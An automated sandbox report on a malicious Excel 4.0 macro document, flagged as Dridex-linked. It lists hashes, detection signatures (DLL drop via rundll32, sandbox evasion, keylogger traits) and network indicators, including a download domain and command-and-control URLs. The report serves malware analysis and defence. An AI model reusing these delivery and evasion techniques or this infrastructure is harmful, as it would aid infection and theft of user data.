Analysis Report Documents_460000622_1464906353.xls

Overview

General Information

Sample Name: Documents_460000622_1464906353.xls
Analysis ID: 383422
MD5: bcd540201ec5e0301816d194bb15ec30
SHA1: e5ca3f6cbb69736c904ff77f7ab6514fc48153a3
SHA256: a83ce7af997c7514b9faa386fde353ce094e7ef5bfc31dfb52dc9f5d7cfee43e

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara detected Xls With Macro 4.0
Yara signature match

Classification

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 104.21.3.47:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.12.4.186:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: Binary string: wininet.pdb source: rundll32.exe, 00000004.00000003.2162769102.0000000002430000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb;Y source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: rundll32.exe, 00000004.00000003.2162563408.0000000002440000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: rundll32.exe, 00000004.00000003.2166262652.0000000002531000.00000004.00000001.sdmp
Source: Binary string: c:\over\sat\63_Safe\tra\fell\clear.pdb source: rundll32.exe, 00000004.00000002.2257199515.000000006E815000.00000002.00020000.sdmp, ndgfht.frg.0.dr
Source: Binary string: shell32.pdb9 source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: rundll32.exe, 00000004.00000003.2163524826.0000000002430000.00000004.00000001.sdmp
Source: Binary string: wuser32.pdb source: rundll32.exe, 00000004.00000003.2165167712.0000000002630000.00000004.00000001.sdmp
Source: Binary string: ole32.pdb source: rundll32.exe, 00000004.00000003.2163347382.0000000002430000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: rundll32.exe, 00000004.00000003.2163266519.0000000002350000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp
Source: Binary string: crypt32.pdb source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E77F61E FindFirstFileExW, 4_2_6E77F61E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E802EC8 FindFirstFileExA, 4_2_6E802EC8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E803336 FindFirstFileExA, 4_2_6E803336
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6E803361 FindFirstFileExW, 4_2_6E803361

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ohior[1].dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: ohior[1].dll.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: whiskyexpanse.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.3.47:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.3.47:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 52.12.4.186:443 -> 192.168.2.22:49170
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US AMAZON-02US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox View JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
Source: unknown TCP traffic detected without corresponding DNS query: 52.12.4.186
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\585D4361.emf
Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: whiskyexpanse.com
Source: rundll32.exe, 00000004.00000003.2163723159.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000004.00000003.2170206106.0000000000335000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?f47754d4c3434
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.gva.es0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: rundll32.exe, 00000004.00000002.2255083971.0000000002F10000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2255083971.0000000002F10000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at0E
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org/doc0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.acabogacia.org0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certifikat.dk/repository0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.chambersign.org1
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.comsign.co.il/cps0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.crc.bg0
Source: rundll32.exe, 00000004.00000002.2254619815.000000000254B000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.disig.sk/ca0f
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.e-me.lv/repository0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.entrust.net/CRL/net1.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.firmaprofesional.com0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.globaltrust.info0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.globaltrust.info0=
Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2258206617.0000000001E17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254283058.0000000000B17000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: rundll32.exe, 00000003.00000002.2257960618.0000000001C30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000003.2162769102.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.passport.com
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0%
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.signatur.rtr.at/current.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.sk.ee/cps/0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.ssc.lt/cps03
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.valicert.com/1
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: rundll32.exe, 00000004.00000002.2254128474.0000000000930000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: rundll32.exe, 00000004.00000003.2166659967.00000000002DA000.00000004.00000001.sdmp String found in binary or memory: https://52.12.4.186/5B
Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp String found in binary or memory: https://52.12.4.186/h
Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp String found in binary or memory: https://52.12.4.186/news/update
Source: rundll32.exe, 00000004.00000002.2253968254.000000000027D000.00000004.00000020.sdmp String found in binary or memory: https://52.12.4.186/news/update6
Source: rundll32.exe, 00000004.00000002.2254004923.00000000002BE000.00000004.00000020.sdmp String found in binary or memory: https://52.12.4.186/news/updateA
Source: rundll32.exe, 00000004.00000002.2254004923.00000000002BE000.00000004.00000020.sdmp String found in binary or memory: https://52.12.4.186/news/updateF
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: rundll32.exe, 00000004.00000002.2254613603.000000000253F000.00000004.00000001.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.hu/docs/
Source: rundll32.exe, 00000004.00000003.2165008902.0000000002430000.00000004.00000001.sdmp String found in binary or memory: https://www.netlock.net/docs
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown HTTPS traffic detected: 104.21.3.47:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.12.4.186:443 -> 192.168.2.22:49170 version: TLS 1.2

